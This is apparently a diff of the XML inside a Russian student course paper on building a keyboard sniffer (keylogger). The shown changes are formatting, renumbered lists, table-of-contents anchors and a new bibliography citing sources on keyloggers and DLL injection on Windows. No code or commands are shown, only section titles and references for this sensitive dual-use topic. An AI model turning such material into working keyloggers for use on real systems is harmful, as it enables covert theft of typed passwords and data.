+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
           <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -9212,70 +10027,359 @@
         <w:pStyle w:val="1"/>
         <w:jc w:val="center"/>
         <w:rPr>
-          <w:b w:val="0"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+      <w:bookmarkStart w:id="3" w:name="_Toc414805631"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Список литературы</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="3"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Э. Таненбаум. Современные операционные системы, 3-е издание : Издательство: Питер, 2010. – 1116 с.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Кейлогер</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>— Википедия [Электронный ресурс]. – Электронные данные. –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId9" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a3"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:lang w:eastAsia="en-US"/>
+          </w:rPr>
+          <w:t>https://ru.wikipedia.org/wiki/Кейлогер</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Клавиатурные шпионы. Варианты реализации кейлоггеров в ОС Windows.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Электронный ресурс</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>. –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Электронные данные. - </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId10" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a3"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:lang w:eastAsia="en-US"/>
+          </w:rPr>
+          <w:t>https://securelist.ru/analysis/77/klaviaturny-e-shpiony-varianty-realiz/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">DLL </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">— </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="3" w:name="_Toc414805631"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
+        <w:t>Wikipedia</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Список</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
+        <w:t>[Электронный ресурс]. – Электронные данные. –</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:sz w:val="36"/>
+      <w:hyperlink r:id="rId11" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="a3"/>
+            <w:sz w:val="28"/>
+            <w:szCs w:val="28"/>
+            <w:lang w:eastAsia="en-US"/>
+          </w:rPr>
+          <w:t>https://ru.wikipedia.org/wiki/DLL_injection</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:lang w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>литературы</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="3"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-        <w:rPr>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ae"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>К</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>лавиатурные шпионы (кейлоггеры)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>[Электронный ресурс]. – Электронные данные.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - http://www.cyberguru.ru/operating-systems/windows-security/keyloggers-page17.html</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1134" w:right="850" w:bottom="1134" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
@@ -9449,6 +10553,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1E8E55A4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="4E903A8E"/>
+    <w:lvl w:ilvl="0" w:tplc="0419000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0419000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04190019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0419001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="213105F8"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="66925C16"/>
@@ -9597,7 +10790,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3B9C1A0E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="87C2B492"/>
@@ -9737,7 +10930,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CC972A5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="EE0A7D28"/>
@@ -9850,7 +11043,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="6AF50F13"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F1C6DF66"/>
@@ -9973,19 +11166,22 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="3">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="4">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="5">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -11009,7 +12205,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C5295EBD-EFCA-42F8-AB8A-58E6ADD88CEC}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F48AD094-8995-4150-A1A0-FAF45852FD09}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Курсовая_Работа_Клавиатурный_Сниффер .docx
+++ b/Курсовая_Работа_Клавиатурный_Сниффер .docx
@@ -681,10 +681,10 @@
           <w:pPr>
             <w:pStyle w:val="11"/>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -708,14 +708,11 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc420712301" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752642" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ВВЕДЕНИЕ</w:t>
             </w:r>
@@ -723,8 +720,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -732,8 +727,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -741,25 +734,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712301 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752642 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -767,8 +754,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>3</w:t>
             </w:r>
@@ -776,8 +761,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -790,29 +773,26 @@
               <w:tab w:val="left" w:pos="480"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712302" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752643" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -820,9 +800,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>ОБЗОР ЛИТЕРАТУРЫ</w:t>
             </w:r>
@@ -830,8 +807,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -839,8 +814,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -848,25 +821,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712302 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752643 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -874,8 +841,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
@@ -883,8 +848,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -898,29 +861,26 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712303" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752644" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>1.1</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-                <w:noProof/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -928,9 +888,6 @@
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>Спецификация клавиатурных снифферов</w:t>
             </w:r>
@@ -938,8 +895,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -947,8 +902,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -956,25 +909,19 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc420712303 \h </w:instrText>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc420752644 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -982,8 +929,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>4</w:t>
             </w:r>
@@ -991,8 +936,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -1005,20 +948,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
               <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc420712304" w:history="1">
+          <w:hyperlink w:anchor="_Toc420752645" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="a3"/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:t>1.2 Наиболее популярные технические подходы к построению программных клавиатурных снифферов.</w:t>
             </w:r>
@@ -1026,8 +966,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1035,8 +973,6 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
@@ -1044,25 +980,19 @@
               <w:rPr>
